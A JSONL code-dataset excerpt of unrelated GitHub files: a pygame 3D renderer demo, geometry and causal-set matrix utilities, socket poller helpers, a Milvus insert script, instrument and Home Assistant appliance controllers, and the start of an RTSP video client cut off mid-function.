# Decrease this value to increase the performance (but decrease the quality)\ndim = (1280 * PERF, 720 * PERF)\n\nview_distance = 7\n\nmouse_sensitivity = 0.1\n\nscreen = pygame.display.set_mode(dim, pygame.SCALED) # | pygame.FULLSCREEN\n\nclock = pygame.time.Clock()\n\n# LOAD IMAGES\n\nimage = pygame.image.load(\".\\\\example\\\\bg.png\").convert_alpha() # WARNING: the \".convert_alpha()\" is mandatory\nred_blue_gradiant = pygame.image.load(\".\\\\example\\\\red_blue.png\").convert_alpha()\ntransparent = pygame.image.load(\".\\\\example\\\\transparent.png\").convert_alpha()\nuniform = pygame.image.load(\".\\\\example\\\\white.png\").convert_alpha()\n\n# If your wondering why the \".convert_alpha()\" is mandatory,\n# it's because in pygame, the pixel buffer will differ depending on the image format.\n# Using the \".convert_alpha()\" will convert the image to the same format as the screen.\n# In future versions, I will try to make the \".convert_alpha()\" optional.\n# But anyway, there is no reason for you to not use \".convert_alpha()\" in pygame, so don't worry about it.\n\n\n# LOAD STATIC SURFACES\n\nscene.add_wall(red_blue_gradiant,\n (1, 2, 2),\n (1, 0, 0))\n\nscene.add_wall(image,\n (1.5, 2, 0.5),\n (1.5, 0, 2.5))\n\nscene.add_wall(transparent,\n (-1, 2, 0),\n (-1, 0, 2))\n\nscene.add_quad(image,\n (-1 + 0.5, 2, 2),\n (0.75, 1.75, 2),\n (1, 0.5, 2),\n (-1, 0, 2))\n\nscene.add_surface(image,\n (-1, 0.0, 2),\n (1, 0.0, 2),\n (-1, 0.0, 0))\n\nscene.add_surface(image,\n (-2, 2, 1),\n (-2, 2, 0),\n (-3, 0, 1))\n\nspot = 0\nalpha = 0.0\nif __name__ == \"__main__\":\n y_angle = 90. # look toward the Z axis ( 0° = look toward the X axis; 90° = look toward the Z axis)\n x_angle = 0. # look toward the horizon ( 90° = look toward the sky; -90° = look toward the ground)\n x = 0.\n z = 1.\n y = 1.\n speed = 1. / 3.6 # 1 km/h in m/s\n\n # MAIN LOOP\n while True:\n # RESET THE SCREEN\n screen.fill((0, 0, 0, 0))\n\n # HANDLE THE TIME AND THE FPS\n keys = pygame.key.get_pressed()\n time_stamp = clock.tick(60) / 100\n # fps = clock.get_fps()\n # print(fps)\n\n # HANDLE THE EVENTS\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n # HANDLE THE INPUTS\n\n if pygame.key.get_focused(): # Place the mouse in the center of the screen when the window is active\n pygame.mouse.set_visible(False) # Hide the mouse\n pygame.event.set_grab(True) # Grab the mouse\n rel = pygame.mouse.get_rel() # Get the mouse movement since the last frame\n if rel[0] or rel[1]: # When the mouse move, replace it in the center of the screen\n pygame.mouse.set_pos(dim[0] // 2, dim[1] // 2)\n x_angle -= rel[1] * mouse_sensitivity\n y_angle -= rel[0] * mouse_sensitivity\n x_angle = max(min(x_angle, 90), -90) # Limit the angle to prevent the player from looking upside down\n else:\n # Give back the mouse control when the window is not active\n pygame.mouse.set_visible(True)\n pygame.event.set_grab(False)\n\n # Move forward\n if any((keys[pygame.K_z], keys[pygame.K_w], keys[pygame.K_UP])):\n z += time_stamp * speed * sin(radians(y_angle))\n x += time_stamp * speed * cos(radians(y_angle))\n # Move backward\n elif keys[pygame.K_s] or keys[pygame.K_DOWN]:\n z -= time_stamp * speed * sin(radians(y_angle))\n x -= time_stamp * speed * cos(radians(y_angle))\n # Move left\n if any((keys[pygame.K_q], keys[pygame.K_a], keys[pygame.K_LEFT])):\n z += time_stamp * speed * sin(radians(y_angle + 90))\n x += time_stamp * speed * cos(radians(y_angle + 90))\n # Move right\n elif keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n z -= time_stamp * speed * sin(radians(y_angle + 90))\n x -= time_stamp * speed * cos(radians(y_angle + 90))\n\n # Move up\n if keys[pygame.K_SPACE]:\n y += time_stamp * speed\n # Move down\n elif keys[pygame.K_LSHIFT]:\n y -= time_stamp * speed\n\n # ___________________RENDER THE SCENE\n\n # PLACE THE LIGHTS INTO THE SCENE\n\n scene.clear_lights() # Clear the lights. You need to do this anytime a light moves or changes.\n\n # Add a directional light from the player position to where the player is looking\n scene.add_light(\n (x, y, z), # position of the light\n view_distance, # strength of the light\n 0.5, 0.6, 0.7, # color of the light\n # direction of the light\n direction=(x + cos(radians(y_angle)) * cos(radians(x_angle)) * view_distance * 1.8,\n y + sin(radians(x_angle)) * view_distance,\n z + sin(radians(y_angle)) * cos(radians(x_angle)) * view_distance * 1.8),\n )\n\n scene.add_light((0, 0, 0.5), 2, 0.3, 0.6, 0.2) # add a green light at the origin\n\n # add a directional light that moves around the scene\n scene.add_light((cos(spot), 2, 1 + sin(spot)),\n 3, 0.3, 0.3, 1.0,\n direction=(sin(spot), -3, cos(spot)))\n\n spot += 0.07 * time_stamp # move the light\n\n # ADD THE DYNAMIC SURFACES INTO THE SCENE\n\n alpha = (alpha + 0.01 * time_stamp) % 2.0 # Change the alpha value of the surface over time\n\n # Add a surface that disappears and reappears using the alpha value\n scene.add_wall(uniform,\n (-1, 2, 0),\n (1, 0, 0),\n alpha=abs(alpha - 1.0), # alpha value goes from 0.0 ⏫ to 1.0 ⏬ to 0.0\n rm=True)\n\n # RENDER THE SCENE\n\n scene.render(screen,\n (x, y, z),\n x_angle, y_angle,\n fov=120,\n view_distance=view_distance,\n threads=-1)\n\n pygame.display.update()\n","repo_name":"Yvant2000/PySiDoCast","sub_path":"example/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"23093287317","text":"#Dobro, triplo, e quadrado de um número\n\n#Entrada\n\nnum = int(input(\"Digite um número: \\n\"))\n\nresul1 = num * 2\nresul2 = num * 3\nresul3 = num ** 2\n\n#Saída\n\nprint(\"Dobro: \",resul1,\"\\n\" \"Triplo: \",resul2,\"\\n\" \"Quadrado: \",resul3)\n","repo_name":"sabrinaaraujoo/Python","sub_path":"dobro-triplo.py","file_name":"dobro-triplo.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"28873231046","text":"import math\n\nclass Point:\n def __init__(self, x = 0, y = 0):\n self.x = x\n self.y = y\n\n def distance_to_line(self, line):\n perpendicular = abs(line.a * self.x + line.b * self.y + line.c) / \\\n math.sqrt(line.a * line.a + line.b * line.b + line.c * line.c)\n return perpendicular\n\nclass Line:\n def __init__(self, p1, p2):\n if p1.y == p2.y:\n self.a = 0\n self.b = 1\n self.c = -p1.y\n else:\n self.a = 1\n self.b = -self.a * (p2.x - p1.x) / (p2.y - p1.y)\n self.c = -self.a * p1.x - self.b * p1.y\n\ndef squared_distance(p1, p2):\n return (p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y)\n\ndef distance(p1, p2):\n return math.sqrt(squared_distance(p1, p2))\n\ndef segments_intersect(p1, p2, p3, p4):\n # not accounting for the three-on-a-line cases\n l1 = Line(p1, p2)\n l2 = Line(p3, p4)\n\n if abs(l1.a * l2.b - l2.a * l1.b) < 1e-5:\n # parallel\n if abs(l1.b) < 1e-5:\n # vertical\n return min(max(p1.y, p2.y), max(p3.y, p4.y)) > \\\n max(min(p1.y, p2.y), min(p3.y, p4.y))\n if abs(l2.c / l2.b - l1.c / l1.b) >= 1e-5:\n return False\n else:\n return min(max(p1.x, p2.x), max(p3.x, p4.x)) > \\\n max(min(p1.x, p2.x), min(p3.x, p4.x))\n else:\n # intersection point; Cramer's rule\n D = l1.a * l2.b - l1.b * l2.a\n Dx = l1.b * l2.c - l1.c * l2.b\n Dy = l1.c * l2.a - l1.a * l2.c\n x = Dx / D\n y = Dy / D\n\n in_first = False\n in_second = False\n\n if abs(l1.b) < 1e-5:\n # l1 is vertical\n in_first = (y - p1.y) * (y - p2.y) < 0\n else:\n in_first = (x - p1.x) * (x - p2.x) < 0\n\n if abs(l2.b) < 1e-5:\n # l2 is vertical\n in_second = (y - p3.y) * (y - p4.y) < 0\n else:\n in_second = (x - p3.x) * (x - p4.x) < 0\n\n return in_first and in_second\n","repo_name":"dantrag/pyspringsim","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28175318530","text":"from dis import dis\nimport time\nimport poller_config\nimport poller_utility\n\ndef recvdata(conn, delay=2):\n if conn is None:\n return\n footerfound = False\n recvd = conn.recvuntil(poller_config.go_ahead, timeout=delay)\n if not recvd:\n return\n if recvd.find(poller_config.header) >= 0:\n recvd = recvd[recvd.find(poller_config.header) + 5:]\n if recvd.find(poller_config.footer) >= 0:\n footerfound = True\n recvd = recvd[:recvd.find(poller_config.footer)]\n if recvd.find(poller_config.go_ahead) >= 0 and not footerfound:\n recvd = recvd[:recvd.find(poller_config.go_ahead)]\n return recvd.decode('utf-8')\n\ndef senddata(conn, data, display=1):\n if data is not None:\n if display == 1:\n message='User('+data.replace('\\n', ' ').replace('\\r', '')+ ')'\n poller_utility.printMsg(message, poller_config.USER)\n conn.sendline(data.encode('utf-8'))\n\ndef sendSingleMessage(conn, message):\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n senddata(conn, message)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n\ndef sendSingleMessageNoResp(conn, message):\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n senddata(conn, message)\n\ndef getMessage(conn,clean=1):\n tries=10\n while tries > 0:\n time.sleep(1)\n response=recvdata(conn)\n if response is not None:\n tries = 10\n if clean == 1:\n response=response.replace('\\n', ' ').replace('\\r', '')\n poller_utility.printMsg(response, poller_config.RESPONSE)\n return response\n tries-=1\n return -1","repo_name":"cromulencellc/chess-aces","sub_path":"phase_3/eval/kiaora/poller/poller_comms.py","file_name":"poller_comms.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"7885568508","text":"import pandas as pd\nfrom pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility\nfrom towhee import ops, pipe\n\nfrom constants import MILVUS_HOST, MILVUS_PORT, COLLECTION_NAME, TITLE_VECTOR_LENGTH, DATA_PATH\n\nconnections.connect(host=MILVUS_HOST, port=MILVUS_PORT)\n\n\ndef create_milvus_collection(collection_name, dim):\n if utility.has_collection(collection_name):\n utility.drop_collection(collection_name)\n\n fields = [\n FieldSchema(name=\"id\", dtype=DataType.INT64, is_primary=True, auto_id=False),\n FieldSchema(name=\"title\", dtype=DataType.VARCHAR, max_length=500),\n FieldSchema(name=\"title_vector\", dtype=DataType.FLOAT_VECTOR, dim=dim),\n FieldSchema(name=\"link\", dtype=DataType.VARCHAR, max_length=500),\n FieldSchema(name=\"reading_time\", dtype=DataType.INT64),\n FieldSchema(name=\"publication\", dtype=DataType.VARCHAR, max_length=500),\n FieldSchema(name=\"claps\", dtype=DataType.INT64),\n FieldSchema(name=\"responses\", dtype=DataType.INT64)\n ]\n schema = CollectionSchema(fields=fields, description='search text')\n collection = Collection(name=collection_name, schema=schema)\n\n index_params = {\n 'metric_type': \"L2\",\n 'index_type': \"IVF_FLAT\",\n 'params': {\"nlist\": 2048}\n }\n collection.create_index(field_name='title_vector', index_params=index_params)\n return collection\n\n\ncollection = create_milvus_collection(COLLECTION_NAME, TITLE_VECTOR_LENGTH)\n\ninsert_pipe = (pipe.input('df')\n .flat_map('df', 'data', lambda df: df.values.tolist())\n .map('data', 'res', ops.ann_insert.milvus_client(host=MILVUS_HOST,\n port=MILVUS_PORT,\n collection_name=COLLECTION_NAME))\n .output('res')\n )\n\ndf = pd.read_csv(DATA_PATH, converters={'title_vector': lambda x: eval(x)})\ninsert_pipe(df)\n\ncollection.load()\nprint(f\"Collection {COLLECTION_NAME} num_entities: {collection.num_entities}\")\n","repo_name":"petr7555/ai-text-demo","sub_path":"ai_text_demo/milvus_search_titles/01_insert_data.py","file_name":"01_insert_data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19156386063","text":"from instrument import Instrument\nfrom time import sleep\n\nclass Stage(Instrument):\n def __init__(self, address=None, axis=1):\n self.identificator = 'stage'\n super().__init__(address, self.identificator)\n self.axis = axis\n self.last_position = None\n\n def initialise(self):\n self.write(\"MO\")\n\n def write(self, cmd):\n newcmd = str(self.axis) + cmd\n self.instr.write(newcmd)\n\n def ask(self, cmd):\n newcmd = str(self.axis) + cmd\n result = self.instr.ask(newcmd)\n return result\n\n def stop(self):\n self.write('ST')\n\n def check_motor_status(self):\n try: status = int(self.ask('MD?'))\n except:\n return 1\n if status == 0:\n return 1\n else:\n return 0\n\n def move_to(self, new_pos, wait=True):\n if self.check_motor_status() == 1:\n self.stop()\n\n self.write(\"PA {0}\".format(new_pos))\n if wait == True:\n while (self.check_motor_status() == 1):\n sleep(0.05)\n\n def read_pos(self):\n try:\n pos = float(self.ask('TP'))\n self.last_position = pos\n return pos\n except:\n print(\"Can't read the stage position!\")\n return None\n\n def set_speed(self, speed='max'):\n max_speed = float(self.ask('VU?'))\n\n if speed == 'max':\n self.write('VA {0}'.format(max_speed))\n else:\n try: speed_float = float(speed)\n except ValueError:\n print(\"The speed value must be a number!\")\n return None\n else:\n if speed_float > max_speed:\n print(\"The maximum speed value is {0}\".format(max_speed))\n return None\n else:\n self.write('VA {0}'.format(speed_float))\n","repo_name":"alkamid/lab-suite","sub_path":"stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30523562096","text":"\"\"\"Platform for Miele switch integration.\"\"\"\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\nimport logging\nfrom typing import Any, Final\n\nimport aiohttp\n\nfrom homeassistant.components.switch import SwitchEntity, SwitchEntityDescription\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom . import get_coordinator\nfrom .const import (\n ACT_START_SUPERCOOL,\n ACT_START_SUPERFREEZE,\n ACT_STOP_SUPERCOOL,\n ACT_STOP_SUPERFREEZE,\n ACTIONS,\n API,\n COFFEE_SYSTEM,\n DIALOG_OVEN,\n DISHWASHER,\n DOMAIN,\n FREEZER,\n FRIDGE,\n FRIDGE_FREEZER,\n HOOD,\n MANUFACTURER,\n MICROWAVE,\n OVEN,\n OVEN_MICROWAVE,\n POWER_OFF,\n POWER_ON,\n PROCESS_ACTION,\n STEAM_OVEN,\n STEAM_OVEN_COMBI,\n STEAM_OVEN_MICRO,\n STEAM_OVEN_MK2,\n TUMBLE_DRYER,\n TUMBLE_DRYER_SEMI_PROFESSIONAL,\n WASHER_DRYER,\n WASHING_MACHINE,\n WINE_CABINET_FREEZER,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\n@dataclass\nclass MieleSwitchDescription(SwitchEntityDescription):\n \"\"\"Class describing Miele switch entities.\"\"\"\n\n data_tag: str | None = None\n type_key: str = \"ident|type|value_localized\"\n on_value: int = 0\n off_value: int = 0\n on_data: dict[str, Any] | None = None\n off_data: dict[str, Any] | None = None\n\n\n@dataclass\nclass MieleSwitchDefinition:\n \"\"\"Class for defining switch entities.\"\"\"\n\n types: tuple[int, ...]\n description: MieleSwitchDescription = None\n\n\nSWITCH_TYPES: Final[tuple[MieleSwitchDefinition, ...]] = (\n MieleSwitchDefinition(\n types=[FRIDGE, FRIDGE_FREEZER],\n description=MieleSwitchDescription(\n key=\"supercooling\",\n data_tag=\"state|status|value_raw\",\n on_value=14,\n icon=\"mdi:snowflake\",\n translation_key=\"supercooling\",\n on_data={PROCESS_ACTION: ACT_START_SUPERCOOL},\n off_data={PROCESS_ACTION: ACT_STOP_SUPERCOOL},\n ),\n ),\n MieleSwitchDefinition(\n types=[FREEZER, FRIDGE_FREEZER, WINE_CABINET_FREEZER],\n description=MieleSwitchDescription(\n key=\"superfreezing\",\n data_tag=\"state|status|value_raw\",\n on_value=13,\n icon=\"mdi:snowflake\",\n translation_key=\"superfreezing\",\n on_data={PROCESS_ACTION: ACT_START_SUPERFREEZE},\n off_data={PROCESS_ACTION: ACT_STOP_SUPERFREEZE},\n ),\n ),\n MieleSwitchDefinition(\n types=[\n WASHING_MACHINE,\n TUMBLE_DRYER,\n TUMBLE_DRYER_SEMI_PROFESSIONAL,\n DISHWASHER,\n OVEN,\n OVEN_MICROWAVE,\n STEAM_OVEN,\n MICROWAVE,\n COFFEE_SYSTEM,\n HOOD,\n WASHER_DRYER,\n STEAM_OVEN_COMBI,\n STEAM_OVEN_MICRO,\n DIALOG_OVEN,\n STEAM_OVEN_MK2,\n ],\n description=MieleSwitchDescription(\n key=\"poweronoff\",\n data_tag=\"state|status|value_raw\",\n off_value=1,\n icon=\"mdi:power\",\n translation_key=\"power_on\",\n on_data={POWER_ON: True},\n off_data={POWER_OFF: True},\n ),\n ),\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigType,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the switch platform.\"\"\"\n coordinator = await get_coordinator(hass, config_entry)\n\n entities = []\n for idx, ent in enumerate(coordinator.data):\n for definition in SWITCH_TYPES:\n if coordinator.data[ent][\"ident|type|value_raw\"] in definition.types:\n entities.append(\n MieleSwitch(\n coordinator,\n idx,\n ent,\n definition.description,\n hass,\n config_entry,\n )\n )\n\n async_add_entities(entities)\n\n\nclass MieleSwitch(CoordinatorEntity, SwitchEntity):\n \"\"\"Representation of a Switch.\"\"\"\n\n entity_description: MieleSwitchDescription\n\n def __init__(\n self,\n coordinator: DataUpdateCoordinator,\n idx,\n ent,\n description: MieleSwitchDescription,\n hass: HomeAssistant,\n entry: ConfigType,\n ):\n \"\"\"Initialize the switch.\"\"\"\n super().__init__(coordinator)\n self._api = hass.data[DOMAIN][entry.entry_id][API]\n self._api_data = hass.data[DOMAIN][entry.entry_id]\n\n self._idx = idx\n self._ent = ent\n self.entity_description = description\n _LOGGER.debug(\"init switch %s\", ent)\n appl_type = self.coordinator.data[self._ent][self.entity_description.type_key]\n if appl_type == \"\":\n appl_type = self.coordinator.data[self._ent][\n \"ident|deviceIdentLabel|techType\"\n ]\n self._attr_has_entity_name = True\n self._attr_unique_id = f\"{self.entity_description.key}-{self._ent}\"\n self._attr_device_info = DeviceInfo(\n identifiers={(DOMAIN, self._ent)},\n serial_number=self._ent,\n name=appl_type,\n manufacturer=MANUFACTURER,\n model=self.coordinator.data[self._ent][\"ident|deviceIdentLabel|techType\"],\n )\n\n @property\n def is_on(self):\n \"\"\"Return the state of the switch.\"\"\"\n if self.entity_description.key in {\"supercooling\", \"superfreezing\"}:\n return (\n self.coordinator.data[self._ent][self.entity_description.data_tag]\n == self.entity_description.on_value\n )\n\n elif self.entity_description.key in {\"poweronoff\"}:\n power_data = (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_OFF, True)\n )\n return power_data\n\n return False\n\n @property\n def available(self):\n \"\"\"Return the availability of the entity.\"\"\"\n\n if not self.coordinator.last_update_success:\n return False\n\n if self.entity_description.key in {\"poweronoff\"}:\n power_data = (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_OFF, False)\n ) or (\n self._api_data.get(ACTIONS, {}).get(self._ent, {}).get(POWER_ON, False)\n )\n return power_data\n\n return self.coordinator.data[self._ent][\"state|status|value_raw\"] != 255\n\n async def async_turn_on(self, **kwargs):\n \"\"\"Turn on the device.\"\"\"\n _LOGGER.debug(\"turn_on -> kwargs: %s\", kwargs)\n try:\n await self._api.send_action(self._ent, self.entity_description.on_data)\n except aiohttp.ClientResponseError as ex:\n _LOGGER.error(\"Turn_on: %s - %s\", ex.status, ex.message)\n\n # await self.coordinator.async_request_refresh()\n\n async def async_turn_off(self, **kwargs):\n \"\"\"Turn off the device.\"\"\"\n _LOGGER.debug(\"turn_off -> kwargs: %s\", kwargs)\n try:\n await self._api.send_action(self._ent, self.entity_description.off_data)\n except aiohttp.ClientResponseError as ex:\n _LOGGER.error(\"Turn_off: %s - %s\", ex.status, ex.message)\n\n # await self.coordinator.async_request_refresh()\n","repo_name":"astrandb/miele","sub_path":"custom_components/miele/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"2"} +{"seq_id":"39750100697","text":"__author__ = \"\\n\".join([\"James Clough (james.clough91@gmail.com)\"])\n\nimport numpy as np\n\ndef causet_adj_matrix(S, R):\n \"\"\" Return causal set adjacency matrix A\n \n S: separations\n R: original coordinates\"\"\"\n N = S.shape[0]\n A = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n # check time ordering - A[i,j] is 1 if i is in the future of j\n if R[i,0] > R[j,0]:\n if S[i,j] < 0:\n A[i,j] = 1.\n return A \n \ndef transitive_completion(A_):\n \"\"\" Transitively complete adjacency matrix A\"\"\"\n A = A_[:,:]\n A_0 = A[:,:]\n N, _ = A.shape\n A_diff = True\n i = 0\n while A_diff:\n A_old = A[:,:]\n A = np.dot(A, A_0)\n A += A_0\n A[A>1.] = 1.\n if np.array_equal(A_old, A):\n A_diff = False\n assert i < N, 'ERROR - Transitive Completion required more than N steps'\n i += 1\n return A\n \ndef transitive_reduction(A_, LP=None):\n \"\"\" Transitively reduce adjacency matrix A\n \n plan is to look at successive powers of A and if an element is 1 in both\n then it represents an edge which is transitively implied\n we need to do this |LP| times - \n - could do it N times to be sure (start here)\n - could compute |LP| but that might be slower\n - could allow |LP| as optional input incase it is already calculated\n \"\"\"\n A = A_[:,:]\n A_0 = A[:,:]\n N, _ = A.shape\n if LP:\n max_path = LP\n else:\n max_path = N\n i = 0\n while i < max_path:\n A = np.dot(A, A_0)\n A = A_0 - A\n A[A<1] = 0\n A[A>1] = 1\n i += 1\n return A\n\ndef longest_path_matrix(A, dmax=None):\n \"\"\" Calculate all longest paths and return them in a matrix\n \n Arguments:\n A -- adjacency matrix\n dmax -- maximum path length to be returned\n \n Result should be an NxN assymetric matrix of longest paths\n \n Notes:\n JC - I believe this scales like N**3\n Finding one longest path can be done in linear time\n And we need to find N**2 of them so this is reasonable\n \n JC - The longest path is conjectured to approximate the geodesic in \n Lorentzian spacetimes but this is not proven to my knowledge \n \"\"\"\n N = A.shape[0]\n if dmax is None:\n dmax = N\n LP = np.zeros((N, N))\n i = 1\n B = A[:,:]\n while np.sum(B) > 0.:\n path_exist = np.sign(B)\n path_length = i * path_exist\n LP = np.maximum.reduce((LP, path_length))\n B = np.dot(B, A)\n i += 1\n if i == dmax:\n return LP\n return LP\n \ndef naive_spacelike_matrix(LP, dmax=None, k=None): \n \"\"\" Calculate all naive spacelike distances and return them in a matrix\n \n Arguments:\n LP -- longest path matrix\n dmax -- maximum spacelike distance to be returned\n k -- only determine distances to k 'landmark' points, and leave the rest\n # this feature needs testing\n \n Result should be an NxN symmetric matrix of negative longest paths\n and positive naive spacelike separations\n \n JC - this seems quite slow when calculated for all N - I think it is the \n limiting factor on embedding large networks in spacetimes\n \"\"\"\n if dmax == None:\n dmax = np.max(LP)\n ds = LP + LP.transpose()\n ds2 = ds * ds * -1\n N = LP.shape[0]\n for i in range(N):\n max_j = i\n if k:\n max_j = np.min([i, k])\n for j in range(max_j):\n # spacelike distance is symmetric so ds[i,j]==ds[j,i], and ds[i,i]==0\n if ds2[i,j] == 0:\n # then they are spacelike separated and need a new value here\n i_past = np.flatnonzero(LP[:,i])\n j_past = np.flatnonzero(LP[:,j])\n w_list = np.intersect1d(i_past, j_past)\n\n i_future = np.flatnonzero(LP[i,:])\n j_future = np.flatnonzero(LP[j,:])\n z_list = np.intersect1d(i_future, j_future)\n if (len(z_list)>0) and (len(w_list)>0):\n # find min non-zero LP from w to z\n sp_dist = dmax\n for w in w_list:\n for z in z_list:\n w_z = LP[w, z]\n if w_z > 0:\n sp_dist = min(sp_dist, w_z)\n else:\n sp_dist = dmax\n \n ds2[i,j] = sp_dist * sp_dist\n ds2[j,i] = sp_dist * sp_dist\n return ds2 \n","repo_name":"JamesClough/dagology","sub_path":"dagology/matrix/matrix_utils.py","file_name":"matrix_utils.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"10447737017","text":"from tkinter import *\nimport tkinter.messagebox\nfrom PIL import Image, ImageTk\nimport socket, threading, os\nfrom Normal.RtpPacket import RtpPacket\nimport glob\nfrom time import time\n\nCACHE_FILE_NAME = \"cache-\"\nCACHE_FILE_EXT = \".jpg\"\n\nclass Client:\n\tINIT = 0\n\tREADY = 1\n\tPLAYING = 2\n\tstate = INIT\n\t\n\tSETUP = 0\n\tPLAY = 1\n\tPAUSE = 2\n\tTEARDOWN = 3\n\t\n\tdef __init__(self, master, serveraddr, serverport, rtpport, filename):\n\t\tself.master = master\n\t\tself.master.protocol(\"WM_DELETE_WINDOW\", self.handler)\n\t\tself.createWidgets()\n\t\tself.serverAddr = serveraddr\n\t\tself.serverPort = int(serverport)\n\t\tself.rtpPort = int(rtpport)\n\t\tself.fileName = filename\n\t\tself.rtspSeq = 0\n\t\tself.sessionId = 0\n\t\tself.requestSent = -1\n\t\tself.teardownAcked = 0\n\t\tself.frameNbr = 0\n\t\tself.playEvent = threading.Event()\n\n\t# Initiatio\n\t# THIS GUI IS JUST FOR REFERENCE ONLY, STUDENTS HAVE TO CREATE THEIR OWN GUI \t\n\tdef createWidgets(self):\n\t\t\"\"\"Build GUI.\"\"\"\n\t\t# Create Setup button\n\t\tself.setup = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.setup[\"text\"] = \"Setup\"\n\t\tself.setup[\"command\"] = self.setupMovie\n\t\tself.setup.grid(row=1, column=0, padx=2, pady=2)\n\t\t\n\t\t# Create Play button\t\t\n\t\tself.start = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.start[\"text\"] = \"Play\"\n\t\tself.start[\"command\"] = self.playMovie\n\t\tself.start.grid(row=1, column=1, padx=2, pady=2)\n\t\t\n\t\t# Create Pause button\t\t\t\n\t\tself.pause = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.pause[\"text\"] = \"Pause\"\n\t\tself.pause[\"command\"] = self.pauseMovie\n\t\tself.pause.grid(row=1, column=2, padx=2, pady=2)\n\t\t\n\t\t# Create Teardown button\n\t\tself.teardown = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.teardown[\"text\"] = \"Teardown\"\n\t\tself.teardown[\"command\"] = self.exitClient\n\t\tself.teardown.grid(row=1, column=3, padx=2, pady=2)\n\t\t\n\t\t# Create a label to display the movie\n\t\tself.label = Label(self.master, height=19)\n\t\tself.label.grid(row=0, column=0, columnspan=4, sticky=W+E+N+S, padx=5, pady=5) \n\t\n\tdef setupMovie(self):\n\t\t\"\"\"Setup button handler.\"\"\"\n\t\tif self.state == Client.INIT:\n\t\t\t# Reset session state\n\t\t\tself.rtspSeq = 0\n\t\t\tself.frameNbr = 0\n\t\t\tself.teardownAcked = 0\n\t\t\t# Setup RTSP\n\t\t\tself.connectToServer()\n\t\t\tthreading.Thread(target=self.recvRtspReply).start()\n\t\t\t# Send request\n\t\t\tself.sendRtspRequest(Client.SETUP)\n\t\n\tdef exitClient(self):\n\t\t\"\"\"Teardown button handler.\"\"\"\n\t\t# Pause movie if it is playing\n\t\tif self.state == Client.PLAYING:\n\t\t\tself.pauseMovie()\n\t\t\twhile self.state == Client.PLAYING:\n\t\t\t\tcontinue\n\t\t\n\t\tif self.state == Client.READY:\n\t\t\t# Send request\n\t\t\tself.sendRtspRequest(Client.TEARDOWN)\n\t\t\tif os.path.exists(CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT):\n\t\t\t\tos.remove(CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT)\n\n\tdef pauseMovie(self):\n\t\t\"\"\"Pause button handler.\"\"\"\n\t\tif self.state == Client.PLAYING:\n\t\t\tself.playEvent.set()\n\t\t\tself.sendRtspRequest(Client.PAUSE)\n\t\n\tdef playMovie(self):\n\t\t\"\"\"Play button handler.\"\"\"\n\t\tif self.state == Client.READY:\n\t\t\tself.playEvent.clear()\n\t\t\tthreading.Thread(target=self.listenRtp).start()\n\t\t\tself.sendRtspRequest(Client.PLAY)\n\t\t\t\n\tdef listenRtp(self):\t\t\n\t\t\"\"\"Listen for RTP packets.\"\"\"\n\t\tpacketLoss = 0\n\t\tpacketSlow = 0\n\t\tvideoData = 0\n\t\tstart = time()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata = self.rtpSocket.recv(20480)\n\t\t\t\tif data:\n\t\t\t\t\trtpPacket = RtpPacket()\n\t\t\t\t\trtpPacket.decode(data)\n\t\t\t\t\tcurrFrameNbr = rtpPacket.seqNum()\n\t\t\t\t\t# Count loss packet\n\t\t\t\t\tif currFrameNbr > self.frameNbr + 1:\n\t\t\t\t\t\tpacketLoss += currFrameNbr - (self.frameNbr + 1) \n\t\t\t\t\t# Count slow 